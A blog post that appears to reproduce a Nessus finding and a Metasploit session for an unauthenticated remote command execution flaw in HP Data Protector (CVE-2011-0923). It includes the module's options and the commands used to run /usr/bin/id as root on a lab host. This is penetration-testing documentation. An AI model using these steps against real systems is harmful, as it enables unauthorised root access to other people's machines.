metasploit - HP Data Protector Remote Command Execution

最新推荐文章于 2022-05-10 13:50:23 发布

Nixawk

最新推荐文章于 2022-05-10 13:50:23 发布

阅读量2.3k

点赞数

本文链接：https://blog.csdn.net/nixawk/article/details/39076061

版权

Pentesting 同时被 3 个专栏收录

160 篇文章 1 订阅

订阅专栏

Vulnerability Analysis

76 篇文章 0 订阅

订阅专栏

Metasploit

65 篇文章 1 订阅

订阅专栏

53641 (1) - HP Data Protector Remote CommandExecution

Synopsis

The remoteservice allows remote execution of arbitrary commands withoutauthentication.

Description

The remote HPData Protector client or server service is affected by a commandexecution vulnerability. A malicious user can send a speciallycrafted packet that causes this service to execute an arbitrary shellcommand with system privileges.

Solution

1. Upgrade toData Protector A.06.20 or later and

2. Enable encryptedcontrol communication services on cell server and all clients incell.

Risk Factor

Critical

CVSS Base Score

10.0(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

CVSS Temporal Score

8.3(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

References

BID	46234
CVE	CVE-2011-0923
XREF	OSVDB:72526
XREF	EDB-ID:17339
XREF	EDB-ID:17648
XREF	EDB-ID:18521
XREF	EDB-ID:27400

Exploitable with

CANVAS(true)Metasploit (true)

Plugin Information:

Publicationdate: 2011/05/03, Modification date: 2013/08/08

Hosts

192.168.1.92 (tcp/5555)

Nessus was able to exploit the vulnerability to execute thecommand
'/usr/bin/id' on the remote host, which produced thefollowing output :
------------------------------ snip------------------------------
sdp2
uid=0(root) gid=0(root)egid=3(sys)groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2
0
------------------------------snip ------------------------------

Attack Details

msf auxiliary(hp_data_protector_cmd) > show options

Module options (auxiliary/admin/hp/hp_data_protector_cmd):

   Name   Current Setting            Required Description
   ----   ---------------            -------- -----------
   CMD    Windows\System32\calc.exe yes       File to execute
   RHOST                             yes       The target address
   RPORT 5555                       yes       The target port

msf auxiliary(hp_data_protector_cmd) > set CMD /usr/bin/id
CMD => /usr/bin/id
msf auxiliary(hp_data_protector_cmd) > set RHOST 192.168.1.92
RHOST => 192.168.1.92
msf auxiliary(hp_data_protector_cmd) > run

[*] 192.168.1.92:5555 - Sending command...
[*] �15 [12:1] ^B[2004] 1409833427 INET sdp2 uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2^F6 0
[*] Auxiliary module execution completed

Nixawk

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
metasploit - HP Data Protector Remote Command Execution

53641 (1) - HP Data Protector Remote CommandExecutionSynopsisThe remoteservice allows remote execution of arbitrary commands withoutauthentication.DescriptionThe remote HPData Protector client
复制链接

扫一扫